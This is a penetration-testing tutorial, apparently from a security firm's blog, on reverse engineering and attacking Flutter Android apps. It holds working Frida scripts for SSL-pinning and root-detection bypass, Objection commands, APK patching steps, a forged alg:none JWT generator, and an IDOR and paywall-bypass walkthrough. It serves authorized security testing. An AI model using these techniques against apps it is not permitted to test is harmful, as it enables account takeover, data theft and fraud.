WEBINAR
How Elite Teams Outpace the Average Adversary

Hacking Flutter Apps: Static, Dynamic, and Beyond

Flutter is Google’s cross-platform app framework that lets developers write apps in Dart and ship them to Android, iOS, web, and desktop without rewriting code. Instead of traditional Java or Kotlin for Android, Flutter compiles Dart into native ARM binaries and packages them with the Flutter engine. On Android, that produces an APK or AAB containing a tiny Java/Kotlin wrapper, the Flutter runtime, a native library called libapp.so (where all your Dart logic lives), and an assets/flutter_assets folder holding Dart VM snapshots, configs, and UI assets. This is great for developers, but it means that when you’re pentesting, you can’t just fire up JADX and expect to see all the business logic; most of it is buried in native code.
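Because an APK is just a ZIP, the layout described above can be confirmed programmatically before any heavier tooling. A minimal Python sketch (the in-memory demo APK and its file names are hypothetical stand-ins):

```python
import io
import zipfile

def is_flutter_apk(apk) -> bool:
    """Heuristic: a Flutter build ships the engine (libflutter.so)
    plus the compiled Dart library (libapp.so)."""
    with zipfile.ZipFile(apk) as z:
        names = z.namelist()
    has_engine = any(n.endswith("libflutter.so") for n in names)
    has_dart = any(n.endswith("libapp.so") for n in names)
    return has_engine and has_dart

# Demo with a toy in-memory APK mimicking the layout described above
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as z:
    z.writestr("classes.dex", b"")                            # tiny Java/Kotlin wrapper
    z.writestr("lib/arm64-v8a/libflutter.so", b"")            # Flutter engine
    z.writestr("lib/arm64-v8a/libapp.so", b"")                # compiled Dart logic
    z.writestr("assets/flutter_assets/AssetManifest.json", b"{}")

print(is_flutter_apk(buf))  # → True
```

The same check works on a real base.apk path once you have pulled it from the device.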

When I get a Flutter app for testing, my process starts with simply getting the APK. If it’s an internal build, I pull it from a device using:

# Step 1: Get the installation path of the target package

adb shell pm path com.example.app

# Example output:

package:/data/app/~~abc123xyz==/com.example.app-1/base.apk

# Step 2: Pull the APK from the returned path to the local machine

adb pull /data/app/~~abc123xyz==/com.example.app-1/base.apk

The first command reveals the exact filesystem location of the installed APK.

The second command copies the APK from the device to the local system so it can be analyzed using static or dynamic testing tools.

If it’s a public app, I download it using Raccoon or APKPure.

Raccoon → Pulls directly from Google Play

APKPure → Mirrors publicly released APKs

Once I have the APK, I unpack it with apktool d app.apk and browse the output. The smali code is usually minimal, just a MainActivity or FlutterActivity bootstrap. The real target is libapp.so inside lib/arm64-v8a or lib/armeabi-v7a. I also check assets/flutter_assets for kernel_blob.bin, isolate_snapshot_data, AssetManifest.json, and other static files that sometimes contain secrets, hardcoded API endpoints, or even debug toggles.
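That triage step over the apktool output can be scripted so the interesting Flutter files surface immediately. A sketch, assuming a standard apktool directory layout (the toy directory below is only for demonstration):

```python
import os
import pathlib
import tempfile

# Files worth pulling out of a Flutter build for closer inspection
INTERESTING = {"libapp.so", "kernel_blob.bin", "isolate_snapshot_data", "AssetManifest.json"}

def triage(apk_dir):
    """Walk an apktool output directory and flag Flutter artifacts worth inspecting."""
    hits = []
    for root, _dirs, files in os.walk(apk_dir):
        hits += [os.path.join(root, f) for f in files if f in INTERESTING]
    return sorted(hits)

# Demo against a toy directory mimicking apktool output
with tempfile.TemporaryDirectory() as d:
    p = pathlib.Path(d)
    (p / "lib" / "arm64-v8a").mkdir(parents=True)
    (p / "lib" / "arm64-v8a" / "libapp.so").write_bytes(b"")
    (p / "assets" / "flutter_assets").mkdir(parents=True)
    (p / "assets" / "flutter_assets" / "AssetManifest.json").write_text("{}")
    print([os.path.relpath(h, d) for h in triage(d)])
    # → ['assets/flutter_assets/AssetManifest.json', 'lib/arm64-v8a/libapp.so']
```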

For static analysis, I start simple:

# Extract strings from the binary file and search for case-insensitive text

strings lib/arm64-v8a/libapp.so | grep -i key

strings lib/arm64-v8a/libapp.so | grep -i api

strings lib/arm64-v8a/libapp.so | grep -i http

The strings utility extracts human-readable sequences from the compiled binary, which can reveal embedded constants that survived compilation. By filtering for terms such as “key”, “api”, or “http”, I can quickly surface references to API endpoints, authentication-related identifiers, or configuration artifacts. While this does not immediately confirm the presence of a vulnerability, it provides high-signal entry points for deeper static analysis or targeted runtime instrumentation.
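When strings and grep are not at hand, the same extract-and-filter step is a few lines of Python. A sketch; the keyword list is illustrative and the byte blob stands in for libapp.so:

```python
import re

# Keywords that tend to flag secrets and endpoints (illustrative, extend as needed)
SECRETISH = re.compile(rb"key|api|http|token|secret", re.IGNORECASE)

def extract_strings(data: bytes, min_len: int = 6):
    """Mimic the `strings` utility: runs of printable ASCII of a minimum length."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)

def find_candidates(data: bytes):
    """Return printable strings that mention secret-ish keywords."""
    return [s.decode() for s in extract_strings(data) if SECRETISH.search(s)]

# Demo blob standing in for a slice of libapp.so
blob = b"\x00\x01garbage\x00DEBUG_API_BASE=https://staging-api.example.com\x00\x7f"
print(find_candidates(blob))  # → ['DEBUG_API_BASE=https://staging-api.example.com']
```

In practice you would read the real binary with `open("libapp.so", "rb").read()` and review the hits manually.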

I’ve pulled AWS keys, Firebase tokens, Stripe API keys, and internal staging URLs from Flutter binaries this way. In one case, a production build contained the constant DEBUG_API_BASE=https://staging-api.example.com. This indicated that the application retained a reference to a non-production backend environment. Access to such staging systems can significantly expand the attack surface, as they often mirror production functionality while lacking equivalent monitoring, authentication hardening, data protections, or configuration restrictions.

Then I open the binary in Ghidra or radare2. In Flutter applications, much of the business logic is compiled into native shared libraries (e.g., libapp.so). I load these into Ghidra or radare2, depending on the task at hand. radare2 works well for automation and pattern-based analysis, whereas Ghidra’s decompiler and UI are better suited for manually tracing logic and understanding control flow. While the compiled Dart is not human-readable, you can still identify functions that handle crypto, networking, or business logic. For example, I’ve hooked into methods that check subscription status and force them to return true, essentially bypassing paywalls during testing.

If kernel_blob.bin is present, I try ReFlutter from GitHub to extract partial Dart code. In a few lucky cases, I’ve recovered readable function names like verifyUserToken or fetchOrders. In Flutter applications, where much of the Dart logic is compiled into native code, symbol names can reveal high-value functionality. When I encounter functions related to authentication, certificate validation, or token handling, they become immediate candidates for runtime instrumentation using tools such as Frida. This allows me to observe how sensitive data is processed without having to reverse-engineer the entire binary upfront.
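Triaging recovered symbol names for instrumentation candidates is easy to automate. A sketch; the pattern and the sample names below are illustrative, not taken from any real dump:

```python
import re

# Substrings that hint at security-relevant logic (illustrative list)
HIGH_VALUE = re.compile(r"auth|token|cert|pin|verify|subscri", re.IGNORECASE)

def triage_symbols(symbols):
    """Keep only function names that suggest auth, crypto, or entitlement checks."""
    return [s for s in symbols if HIGH_VALUE.search(s)]

# Hypothetical names of the kind ReFlutter sometimes recovers
names = ["verifyUserToken", "fetchOrders", "renderButton", "checkSubscription"]
print(triage_symbols(names))  # → ['verifyUserToken', 'checkSubscription']
```

The survivors become the first targets for Frida hooks.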

The AndroidManifest.xml is another treasure chest. I’ve found exported BroadcastReceivers that accepted intents with JSON payloads, which were directly processed by the app without auth checks. In one assessment, this misconfiguration resulted in remote data injection. In another case, it exposed an internal API surface that could be triggered from a separate application context.

The root cause was insufficient validation around inter-process communication, allowing externally supplied data to reach privileged internal functionality. While the impact varied by application, it demonstrated how seemingly minor exposure points in Flutter apps can escalate into meaningful security risks.

On a rooted test device, I always check /data/data/<package>/shared_prefs/ and /databases/. Flutter developers sometimes forget that SharedPreferences is just plaintext XML. I’ve found refresh tokens, access tokens, and PII stored there. For example, /data/data/com.example/shared_prefs/user.xml contained:

<string name="refresh_token">eyJhbGciOiJIUzI1NiIsInR5cCI6...</string>
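A pref file like that can be triaged offline before touching the API. A minimal sketch that parses the SharedPreferences XML and decodes the JWT claims without verifying the signature; the file contents and claims below are hypothetical:

```python
import base64
import json
import xml.etree.ElementTree as ET

# Hypothetical shared_prefs dump pulled from the device
PREFS = '''<map>
  <string name="refresh_token">eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMDAxIn0.sig</string>
</map>'''

def tokens_from_prefs(xml_text):
    """Pull values whose key names suggest credentials from a SharedPreferences XML."""
    root = ET.fromstring(xml_text)
    return {e.get("name"): e.text for e in root.iter("string")
            if "token" in e.get("name", "").lower()}

def jwt_claims(token):
    """Decode a JWT payload without verifying the signature (inspection only)."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)  # restore stripped base64 padding
    return json.loads(base64.urlsafe_b64decode(payload))

found = tokens_from_prefs(PREFS)
print(jwt_claims(found["refresh_token"]))  # → {'sub': '1001'}
```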

Dropping that token into Postman gave me instant API access.

For dynamic analysis, I fire up Frida. You can install it with:

pip install frida-tools

Push the matching frida-server binary to the device:

# Push the frida-server binary to the device

adb push frida-server /data/local/tmp/

# Update permissions on the binary file to allow execution, then start it

adb shell "chmod 755 /data/local/tmp/frida-server && /data/local/tmp/frida-server &"

Attach with:

# Connect over USB and attach to the already-running app by name

frida -U -n com.example.app

Root detection bypass often lives in Java, so hooking it is simple:

Java.perform(function() {
    var RootCheck = Java.use("com.example.RootCheck");
    RootCheck.isDeviceRooted.implementation = function() {
        console.log("Root bypassed");
        return false;
    };
});

But SSL pinning in Flutter is trickier. The usual Java X509TrustManager hook might fail because dart:io uses its own TLS stack, BoringSSL, compiled into the engine library libflutter.so rather than libapp.so. Hooking the engine library works (in stripped release builds the symbol may not be exported, in which case pattern-scanning scripts are needed):

var ssl_verify = Module.findExportByName("libflutter.so", "SSL_CTX_set_custom_verify");

if (ssl_verify) {
    Interceptor.attach(ssl_verify, {
        onEnter: function(args) {
            console.log("Bypassing SSL pinning");
            // args[2] is the app's custom verify callback; replace it with
            // one that always returns ssl_verify_ok (0)
            args[2] = new NativeCallback(function(ssl, out_alert) {
                return 0;
            }, "int", ["pointer", "pointer"]);
        }
    });
}

With that running, I set my device to proxy through Burp Suite or mitmproxy, and suddenly I’m seeing and modifying every API call.

The vulnerabilities I’ve found this way are very familiar:

  • IDORs: changing GET /api/user/1001 to GET /api/user/1002 and getting someone else’s data.
  • Privilege escalation: sending admin-only API calls from a normal account and having them succeed.
  • Weak JWT validation: modifying the payload and setting the algorithm to none (dropping the signature entirely) to impersonate other users.
  • GraphQL data exposure: apps that ship the GraphQL schema in assets/, letting me query sensitive fields hidden from the UI.
  • Debug logging leaks: verbose logs in logcat showing API keys and full JSON responses.
  • Local storage leaks: tokens, credentials, and private keys stored without encryption.
  • Bypassing paywalls: hooking native “checkSubscription” functions to always return true.
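The weak-JWT case in the list above can be probed offline before replaying anything against the backend. A sketch that forges an unsigned alg:none token; the claims are hypothetical, and a backend that accepts such a token has broken validation:

```python
import base64
import json

def b64url(data: bytes) -> str:
    """Base64url-encode without padding, as JWTs do."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def forge_none_token(payload: dict) -> str:
    """Build an unsigned JWT (alg=none, empty signature segment)."""
    header = b64url(json.dumps({"alg": "none", "typ": "JWT"}).encode())
    return f"{header}.{b64url(json.dumps(payload).encode())}."

# Hypothetical claims for the test
token = forge_none_token({"sub": "1002", "role": "admin"})
```

Send the forged token in the Authorization header; if the API honors it, JWT signature validation is broken.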

For logic bypasses, I sometimes use Objection. Run:

objection --gadget com.example.app explore

The --gadget flag instructs Objection to attach to an application that contains an embedded Frida gadget rather than spawning a new process. This is particularly useful in environments where spawning or attaching traditionally is restricted. Once connected, the interactive shell enables runtime inspection of application behavior, method hooking, and targeted manipulation of sensitive logic paths.

Then try:

# Attempt to disable sslpinning

android sslpinning disable

# Attempt to trick the application into believing the device is not rooted

android root disable

Sometimes it works out of the box, sometimes I need manual Frida hooks.

Patching the app is the next step if I want permanent bypasses. The workflow is:

# Disassemble the APK

apktool d app.apk

# Replace libapp.so with the patched version, then rebuild

apktool b app_folder

# Sign the rebuilt APK (apktool writes it to app_folder/dist/) and install it

apksigner sign --ks my.keystore app_folder/dist/app.apk

adb install app_folder/dist/app.apk

This lets me inject debug logs, skip checks entirely, or hardcode alternate API endpoints for testing.

Over time, I’ve built a small Flutter Pentest Toolkit:

# Extract secrets

strings lib/arm64-v8a/libapp.so | grep -i key

grep -r "api" assets/flutter_assets

 

# Run Frida

adb push frida-server /data/local/tmp/

adb shell "chmod 755 /data/local/tmp/frida-server && /data/local/tmp/frida-server &"

frida -U -n com.example.app

 

# Objection quick bypass

objection --gadget com.example.app explore

 

# SSL pinning bypass (native)

Interceptor.attach(Module.findExportByName("libflutter.so", "SSL_CTX_set_custom_verify"), {
    onEnter: function(args) {
        console.log("SSL bypass");
        // Replace the verify callback so it always returns ssl_verify_ok (0)
        args[2] = new NativeCallback(function(ssl, out_alert) { return 0; },
                                     "int", ["pointer", "pointer"]);
    }
});

Imagine you are doing a pentest on a new Flutter-based Android banking app. The client says it’s secure because “Flutter compiles to native code, so it’s hard to reverse.” You smile because you’ve heard that before!

The APK is handed to you. First move:

# Disassemble the APK

apktool d test.apk

Inside the smali folder, you find almost nothing but MainActivity extending FlutterActivity. The real action is in lib/arm64-v8a/libapp.so and assets/flutter_assets. You run:

strings lib/arm64-v8a/libapp.so | grep -i api

The strings utility pulls any readable text out of the compiled binary, and grep -i api filters it case-insensitively. Even though the file is machine code, hardcoded values like API URLs, staging endpoints, or API keys often remain in plain text inside it, so this quick check can reveal hidden backend URLs or debug configurations during mobile app testing.

Once you run it, you will immediately spot:

https://api.test.com/v1/

https://staging-api.test.com/v1/

Two endpoints, production and staging, both live in the binary. That staging URL might be a lower-security environment worth testing.

Next, you grep the flutter_assets folder:

grep -r "key" assets/flutter_assets

You hit a jackpot:

"firebaseApiKey": "AIzaSyXXXXXX"

"encryptionKey": "supersecretkey123"

These are cleartext API keys, sitting in production code. You then check AndroidManifest.xml. You find an exported activity:

<activity android:name="com.test.activities.SettingsActivity"
          android:exported="true">
    <intent-filter>
        <action android:name="com.test.OPEN_SETTINGS"/>
    </intent-filter>
</activity>

This means any app on the device can send an intent to open this screen, potentially triggering code you shouldn’t have access to.

Static phase done, you now move to dynamic testing. You start Frida:

adb push frida-server /data/local/tmp/

adb shell "chmod 755 /data/local/tmp/frida-server && /data/local/tmp/frida-server &"

frida -U -n com.test.app

You suspect SSL pinning, so you hook it:

var ssl_verify = Module.findExportByName("libflutter.so", "SSL_CTX_set_custom_verify");

if (ssl_verify) {
    Interceptor.attach(ssl_verify, {
        onEnter: function(args) {
            console.log("SSL pinning bypassed");
            // Replace the app's verify callback with one that always
            // returns ssl_verify_ok (0)
            args[2] = new NativeCallback(function(ssl, out_alert) {
                return 0;
            }, "int", ["pointer", "pointer"]);
        }
    });
}

With Burp Suite now intercepting traffic, you log in with a test account. In Burp’s HTTP history, you see:

GET /api/user/1001

You send this request to Repeater, change 1001 to 1002, and hit send. You get another user’s profile, complete with account balance and transaction history. Classic IDOR.
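That manual Repeater step is easy to script when you want to enumerate nearby object IDs (only against systems you are authorized to test). A sketch; the endpoint shape is a hypothetical stand-in for the intercepted request:

```python
def idor_candidates(url_template, observed_id, span=2):
    """Enumerate neighboring object IDs around the one the app used legitimately."""
    base = int(observed_id)
    return [url_template.format(uid=i)
            for i in range(base - span, base + span + 1) if i != base]

# Hypothetical endpoint shape taken from the intercepted request
urls = idor_candidates("https://api.test.com/api/user/{uid}", 1001)
print(urls)
```

Each candidate URL is then replayed with the test account's session; any response containing another user's data confirms the IDOR.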

The vulnerabilities you can find in Flutter apps are the same families as in other mobile apps: broken authentication, IDORs, weak cryptography, insecure storage, insufficient transport security. You just reach them through native analysis and runtime hooking rather than Java decompilation alone.

The key lesson is that pentesting Flutter apps means treating them like native Android apps plus binary reversing challenges. You need static analysis for secrets and endpoints, dynamic hooking for SSL bypass and runtime manipulation, and API abuse testing for business logic flaws. Flutter changes the path to get there, but the vulnerabilities are just as real.

Another interesting area is Flutter WebViews. Even though Flutter itself renders UI with Skia, many apps embed a native WebView for certain sections. If the WebView has JavaScript enabled and loads local files or untrusted URLs, you can inject malicious JavaScript to perform attacks like XSS or steal local storage tokens. Testing for this involves looking at where the WebView loads data from and whether navigation is properly restricted.

Installing the tools for this kind of work is straightforward. On Linux or macOS, apktool can be installed via package managers like brew install apktool or apt install apktool. Ghidra is available from ghidra-sre.org, and Frida can be installed with pip install frida-tools. Objection is installed with pip install objection. For MITM work, Burp Suite or mitmproxy is essential. You’ll also want the Android SDK’s adb tool for interacting with devices, which comes with Android Studio or can be installed separately. On rooted test devices, Magisk modules (for example, ones that auto-start frida-server) or frameworks like Xposed can make hooking easier.

A real pentest of a Flutter app usually blends static and dynamic analysis, moving between reverse engineering and live testing until vulnerabilities emerge. The goal is not just to bypass protections but to understand how the app communicates, where it stores data, and whether its logic can be abused. While Flutter adds some unique challenges, it also hides many developers’ mistakes in plain sight. With the right tools, patience, and methodical testing, those mistakes can be uncovered. And since Flutter is only growing in popularity, knowing how to pentest it properly is becoming a very useful skill for any security professional.

To make this methodology easier to follow during assessments, here’s a quick checklist summarizing the static and dynamic testing steps discussed above:

Static Analysis:

  • Decompile the APK to inspect its structure.
  • Review AndroidManifest.xml for exported activities, services, receivers, and deep links.
  • Locate Flutter-specific components such as lib/arm64-v8a/libapp.so and assets/flutter_assets/.
  • Extract readable strings from libapp.so to identify hardcoded API endpoints, keys, and configuration values.
  • Search libapp.so for potential secrets or credentials.
  • Search flutter_assets for embedded configuration data or keys.
  • Look for backend URLs or staging environments embedded in the binary or assets.
  • Reverse engineer libapp.so using tools such as Ghidra or radare2 to identify authentication logic, crypto routines, or subscription checks.
  • Analyze kernel_blob.bin (if present) using tools such as ReFlutter to recover Dart function names or partial logic.
  • Inspect local application storage such as /data/data/<package>/shared_prefs/ for plaintext tokens or credentials.
  • Inspect /data/data/<package>/databases/ for stored user data or session information.

Dynamic Analysis:

  • Run the application on a rooted Android device or emulator to enable runtime testing.
  • Push frida-server to the device and start it.
  • Attach Frida to the running application.
  • Hook Java methods to bypass root detection checks.
  • Hook native functions in libapp.so to bypass SSL pinning.
  • Configure the device to proxy traffic through Burp Suite or mitmproxy.
  • Intercept and modify API requests to test for IDOR vulnerabilities.
  • Modify API requests to test for privilege escalation issues.
  • Manipulate authentication tokens to test for weak JWT validation.
  • Query backend APIs or schemas to identify GraphQL data exposure.
  • Monitor logcat for sensitive debug logs or leaked API responses.
  • Use Objection to perform runtime exploration and quick security checks.
  • Attempt automated runtime bypasses using Objection commands such as
    android sslpinning disable and android root disable.
  • Patch and rebuild the APK when necessary to bypass protections or modify application behavior.


When the engagement is over, and the APKs are dusted, you start to see Flutter for what it really is: a clever layer hiding the same old weaknesses, just wrapped in a fresh coat of cross-platform paint. Every tap, every HTTP call, every bit of Dart code running inside that engine is an opportunity. You’ve sifted through obfuscated classes until they made sense, torn apart assets the developer thought were hidden, and bent runtime execution to your will. The rush comes when you chain it all together, a debug interface here, an exposed method there, a weak crypto routine in between, and suddenly the walls come down. That’s the beauty of red teaming: it’s not about ticking boxes, it’s about thinking sideways, turning assumptions against the app, and showing that security is a mindset, not a feature. Flutter may be fast, modern, and pretty, but in the end, it plays by the same rules. And rules, as every hacker knows, are made to be broken.

Happy Hacking!

About Cobalt Core
Cobalt Core is our trusted community of vetted pentesters and security researchers. With expertise spanning cloud security, identity attack paths, application security, and offensive tradecraft, Core contributors share hands-on research and real-world insights to help organizations uncover risk and build more resilient security programs.